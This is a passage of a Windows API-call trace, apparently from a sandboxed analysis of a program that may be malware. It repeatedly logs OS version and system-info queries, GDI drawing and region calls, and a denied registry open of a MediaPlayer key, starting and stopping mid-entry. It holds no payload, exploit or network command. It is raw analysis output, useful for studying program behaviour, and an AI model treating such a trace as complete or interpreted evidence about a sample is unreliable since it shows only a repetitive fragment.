szCSDVersion="Service Pack 1")) returned 1 [0091.216] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.216] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.216] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.216] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.216] BeginPath (hdc=0x0) returned 0 [0091.216] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.216] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.216] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.216] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.216] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.216] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.216] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.216] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.216] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf60401d9 [0091.216] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf40401dc [0091.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac5 [0091.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac6 [0091.216] CombineRgn (hrgnDst=0x1045ac5, hrgnSrc1=0xf60401d9, hrgnSrc2=0xf40401dc, iMode=1) returned 1 [0091.216] CombineRgn (hrgnDst=0x1045ac6, hrgnSrc1=0xf60401d9, hrgnSrc2=0xf40401dc, iMode=4) returned 2 [0091.216] CreateSolidBrush (color=0xff) returned 0x2105ac4 [0091.216] CreateSolidBrush (color=0xff0000) returned 0x1105ac7 [0091.216] DeleteObject (ho=0x1105ac7) returned 1 [0091.216] DeleteObject (ho=0xf40401dc) returned 1 [0091.216] DeleteObject (ho=0xf60401d9) returned 1 [0091.216] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.216] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.217] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.217] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.217] BeginPath (hdc=0x0) returned 0 [0091.217] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.217] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.217] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.217] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.217] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf50401dc [0091.217] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf70401d9 [0091.217] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac8 [0091.217] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ac9 [0091.217] CombineRgn (hrgnDst=0x1045ac8, hrgnSrc1=0xf50401dc, hrgnSrc2=0xf70401d9, iMode=1) returned 1 [0091.217] CombineRgn (hrgnDst=0x1045ac9, hrgnSrc1=0xf50401dc, hrgnSrc2=0xf70401d9, iMode=4) returned 2 [0091.217] CreateSolidBrush (color=0xff) returned 0x2105ac7 [0091.217] CreateSolidBrush (color=0xff0000) returned 0x1105aca [0091.217] DeleteObject (ho=0x1105aca) returned 1 [0091.217] DeleteObject (ho=0xf70401d9) returned 1 [0091.217] DeleteObject (ho=0xf50401dc) returned 1 [0091.217] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.217] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.217] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.217] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.217] BeginPath (hdc=0x0) returned 0 [0091.217] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.217] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.217] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.217] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.218] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf80401d9 [0091.218] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf60401dc [0091.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045acb [0091.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045acc [0091.218] CombineRgn (hrgnDst=0x1045acb, hrgnSrc1=0xf80401d9, hrgnSrc2=0xf60401dc, iMode=1) returned 1 [0091.218] CombineRgn (hrgnDst=0x1045acc, hrgnSrc1=0xf80401d9, hrgnSrc2=0xf60401dc, iMode=4) returned 2 [0091.218] CreateSolidBrush (color=0xff) returned 0x2105aca [0091.218] CreateSolidBrush (color=0xff0000) returned 0x1105acd [0091.218] DeleteObject (ho=0x1105acd) returned 1 [0091.218] DeleteObject (ho=0xf60401dc) returned 1 [0091.218] DeleteObject (ho=0xf80401d9) returned 1 [0091.218] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.218] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.218] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.218] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.218] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.218] BeginPath (hdc=0x0) returned 0 [0091.218] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.218] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.218] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.218] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.218] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.218] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.218] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.218] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.218] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf70401dc [0091.218] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf90401d9 [0091.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ace [0091.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045acf [0091.218] CombineRgn (hrgnDst=0x1045ace, hrgnSrc1=0xf70401dc, hrgnSrc2=0xf90401d9, iMode=1) returned 1 [0091.218] CombineRgn (hrgnDst=0x1045acf, hrgnSrc1=0xf70401dc, hrgnSrc2=0xf90401d9, iMode=4) returned 2 [0091.218] CreateSolidBrush (color=0xff) returned 0x2105acd [0091.218] CreateSolidBrush (color=0xff0000) returned 0x1105ad0 [0091.218] DeleteObject (ho=0x1105ad0) returned 1 [0091.218] DeleteObject (ho=0xf90401d9) returned 1 [0091.219] DeleteObject (ho=0xf70401dc) returned 1 [0091.219] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.219] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.219] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.219] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.219] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.219] BeginPath (hdc=0x0) returned 0 [0091.219] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.219] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.219] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.219] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.219] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.219] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.219] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.219] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.305] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfa0401d9 [0091.305] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xf80401dc [0091.305] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ad1 [0091.305] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ad2 [0091.305] CombineRgn (hrgnDst=0x1045ad1, hrgnSrc1=0xfa0401d9, hrgnSrc2=0xf80401dc, iMode=1) returned 1 [0091.305] CombineRgn (hrgnDst=0x1045ad2, hrgnSrc1=0xfa0401d9, hrgnSrc2=0xf80401dc, iMode=4) returned 2 [0091.305] CreateSolidBrush (color=0xff) returned 0x2105ad0 [0091.305] CreateSolidBrush (color=0xff0000) returned 0x1105ad3 [0091.305] DeleteObject (ho=0x1105ad3) returned 1 [0091.305] DeleteObject (ho=0xf80401dc) returned 1 [0091.305] DeleteObject (ho=0xfa0401d9) returned 1 [0091.305] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.305] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.305] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.305] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.305] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.305] BeginPath (hdc=0x0) returned 0 [0091.305] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.305] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.305] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.305] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.305] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.305] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.306] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.306] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf90401dc [0091.306] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfb0401d9 [0091.306] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ad4 [0091.306] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ad5 [0091.306] CombineRgn (hrgnDst=0x1045ad4, hrgnSrc1=0xf90401dc, hrgnSrc2=0xfb0401d9, iMode=1) returned 1 [0091.306] CombineRgn (hrgnDst=0x1045ad5, hrgnSrc1=0xf90401dc, hrgnSrc2=0xfb0401d9, iMode=4) returned 2 [0091.306] CreateSolidBrush (color=0xff) returned 0x2105ad3 [0091.306] CreateSolidBrush (color=0xff0000) returned 0x1105ad6 [0091.306] DeleteObject (ho=0x1105ad6) returned 1 [0091.306] DeleteObject (ho=0xfb0401d9) returned 1 [0091.306] DeleteObject (ho=0xf90401dc) returned 1 [0091.306] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.306] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.306] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.306] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.306] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.306] BeginPath (hdc=0x0) returned 0 [0091.306] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.306] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.306] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.306] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.306] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.306] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.306] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.306] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.307] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfc0401d9 [0091.307] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfa0401dc [0091.307] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ad7 [0091.307] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ad8 [0091.307] CombineRgn (hrgnDst=0x1045ad7, hrgnSrc1=0xfc0401d9, hrgnSrc2=0xfa0401dc, iMode=1) returned 1 [0091.307] CombineRgn (hrgnDst=0x1045ad8, hrgnSrc1=0xfc0401d9, hrgnSrc2=0xfa0401dc, iMode=4) returned 2 [0091.307] CreateSolidBrush (color=0xff) returned 0x2105ad6 [0091.307] CreateSolidBrush (color=0xff0000) returned 0x1105ad9 [0091.307] DeleteObject (ho=0x1105ad9) returned 1 [0091.307] DeleteObject (ho=0xfa0401dc) returned 1 [0091.307] DeleteObject (ho=0xfc0401d9) returned 1 [0091.307] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.307] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.307] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.307] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.307] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.307] BeginPath (hdc=0x0) returned 0 [0091.307] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.307] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.307] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.307] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.307] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.307] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.307] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.307] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.308] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfb0401dc [0091.308] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfd0401d9 [0091.308] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ada [0091.308] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045adb [0091.308] CombineRgn (hrgnDst=0x1045ada, hrgnSrc1=0xfb0401dc, hrgnSrc2=0xfd0401d9, iMode=1) returned 1 [0091.308] CombineRgn (hrgnDst=0x1045adb, hrgnSrc1=0xfb0401dc, hrgnSrc2=0xfd0401d9, iMode=4) returned 2 [0091.308] CreateSolidBrush (color=0xff) returned 0x2105ad9 [0091.308] CreateSolidBrush (color=0xff0000) returned 0x1105adc [0091.308] DeleteObject (ho=0x1105adc) returned 1 [0091.308] DeleteObject (ho=0xfd0401d9) returned 1 [0091.308] DeleteObject (ho=0xfb0401dc) returned 1 [0091.308] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.308] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.308] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.308] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.308] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.308] BeginPath (hdc=0x0) returned 0 [0091.308] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.308] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0091.308] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.308] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0091.308] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0091.308] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0091.308] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0091.308] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0091.309] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xfe0401d9 [0091.309] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xfc0401dc [0091.309] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045add [0091.309] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045ade [0091.309] CombineRgn (hrgnDst=0x1045add, hrgnSrc1=0xfe0401d9, hrgnSrc2=0xfc0401dc, iMode=1) returned 1 [0091.309] CombineRgn (hrgnDst=0x1045ade, hrgnSrc1=0xfe0401d9, hrgnSrc2=0xfc0401dc, iMode=4) returned 2 [0091.309] CreateSolidBrush (color=0xff) returned 0x2105adc [0091.309] CreateSolidBrush (color=0xff0000) returned 0x1105adf [0091.309] DeleteObject (ho=0x1105adf) returned 1 [0091.309] DeleteObject (ho=0xfc0401dc) returned 1 [0091.309] DeleteObject (ho=0xfe0401d9) returned 1 [0091.309] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0091.309] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0091.309] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0091.309] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0091.309] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0091.309] BeginPath (hdc=0x0) returned 0 [0091.309] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0091.309] AngleArc (hdc=0x0, x=0, y=0, r=0x32, 